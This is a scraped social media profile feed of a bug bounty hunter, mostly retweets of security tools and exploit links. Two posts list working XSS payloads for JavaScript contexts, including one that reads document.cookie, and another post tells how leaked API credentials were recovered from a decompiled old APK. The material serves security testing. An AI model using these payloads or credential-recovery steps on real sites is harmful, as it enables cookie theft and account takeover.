dirtycoder0124 Profile Banner
Vipin Panchal Profile
Vipin Panchal

@dirtycoder0124

Followers
4K
Following
1K
Media
71
Statuses
3K

A positive, never give up person. Founder of https://t.co/2H0KjZ5riG Telegram group https://t.co/bjQUMjI9Lh

Joined October 2015
Don't wanna be here? Send us removal request.
@dirtycoder0124
Vipin Panchal
27 days
RT @nightbloodz_: Grafana: CVE-2025-4123 Exploit.
0
5
0
@dirtycoder0124
Vipin Panchal
2 months
RT @Alra3ees: POCs Nuclei.This project is a Python script that is used to clone GitHub projects in batches, obtain Nuclei POCs, and store P….
0
6
0
@dirtycoder0124
Vipin Panchal
3 months
RT @Alra3ees: Rscan:-.Automated scanning tool, more accurate fingerprint recognition, more comprehensive vulnerability scanning. https://t.….
0
17
0
@dirtycoder0124
Vipin Panchal
3 months
');confirm(document.domain);//.';console.log(document.cookie);//.'"><svg/onload=alert(6)>.';location='';fetch('';document.write('<img src=x onerror=alert(1)>');//.';setTimeout(()=>{alert(1)},1000);//.
0
0
0
@dirtycoder0124
Vipin Panchal
3 months
Try these #XSS payloads if output appears in JavaScript. (<script>) #bugbountytips .');alert(1);//.';alert(1)//.";alert(1);//.'});prompt(2)({.'-alert(1)-'.''.replace.call`1${/. /}${alert}`.'blobblob'.replace.call('1,,', /. /, alert).a=alert,(a?a:a)(origin).
1
5
32
@dirtycoder0124
Vipin Panchal
3 months
RT @coffinxp7: Hi EveryOne: just little update i am making this toolkit its better the previous one you just need to enter the domain and i….
0
104
0
@dirtycoder0124
Vipin Panchal
3 months
RT @thelilnix: An XSS payload (in JS context) for WAF and protection bypass (inspired by JavaScript for Hackers book from @garethheyes):. '….
0
13
0
@dirtycoder0124
Vipin Panchal
3 months
Yay, I was awarded a three-digit bounty on @Hacker0x01! #TogetherWeHitHarder .#bugbountytips #bugbountytips .1. Downloaded the older version of the APK. 2. Decompile and find sensitive data like API,etc.3. API, creds were still valid and working.
2
5
81
@dirtycoder0124
Vipin Panchal
3 months
RT @GodfatherOrwa: First live talk for the amazing @XHackerx007 don’t miss this .Lot of interesting stuff for authentication bypass . #bugb….
0
12
0
@dirtycoder0124
Vipin Panchal
3 months
RT @KN0X55: 🚨 1st KNOXSS GIVEAWAY of 2025 ! 🚨 . LIKE + SHARE this. to have a chance to win one of the following subscriptions: . 1 Pro 3-….
0
189
0
@dirtycoder0124
Vipin Panchal
3 months
RT @nav1n0x: Here’s the script if you want to try it yourself:.👉 Sharing the script as-is — make sure to update the….
0
29
0
@dirtycoder0124
Vipin Panchal
3 months
RT @hackprove_: How I Test For Web Cache Vulnerabilities + Tips And Tricks.more information👉
0
22
0
@dirtycoder0124
Vipin Panchal
3 months
0
2
12
@dirtycoder0124
Vipin Panchal
4 months
RT @hackprove_: Account Takeover using SSO Logins.more information👉
0
28
0
@dirtycoder0124
Vipin Panchal
4 months
RT @Alra3ees: Semgrep4BurpSuite: burpsuite extension to analyze javascript files using semgrep
0
25
0
@dirtycoder0124
Vipin Panchal
4 months
RT @Black2Fan: I have published a tool based on jadx that helps analyze Java applications. BFScan generates HTTP….
0
118
0
@dirtycoder0124
Vipin Panchal
4 months
RT @ryancbarnett: We (@akamai_research) often see these CSP bypass attempts. Example for w/OOB beaconing/blind XSS….
0
50
0
@dirtycoder0124
Vipin Panchal
4 months
RT @Alra3ees: js-snitch: Scans remote JavaScript files with Trufflehog + Semgrep to detect leaked secrets
0
36
0
@dirtycoder0124
Vipin Panchal
4 months
RT @Alra3ees: trufflehog-burp-suite-extension: Official TruffleHog Burp Suite Extension. Scan Burp Suite traffic for 800+ different types o….
0
57
0
@dirtycoder0124
Vipin Panchal
4 months
RT @FaIyaZz007: Most people don't you this BurpSuite feature. In my latest video, I show how it can help find account takeovers and access….
0
25
0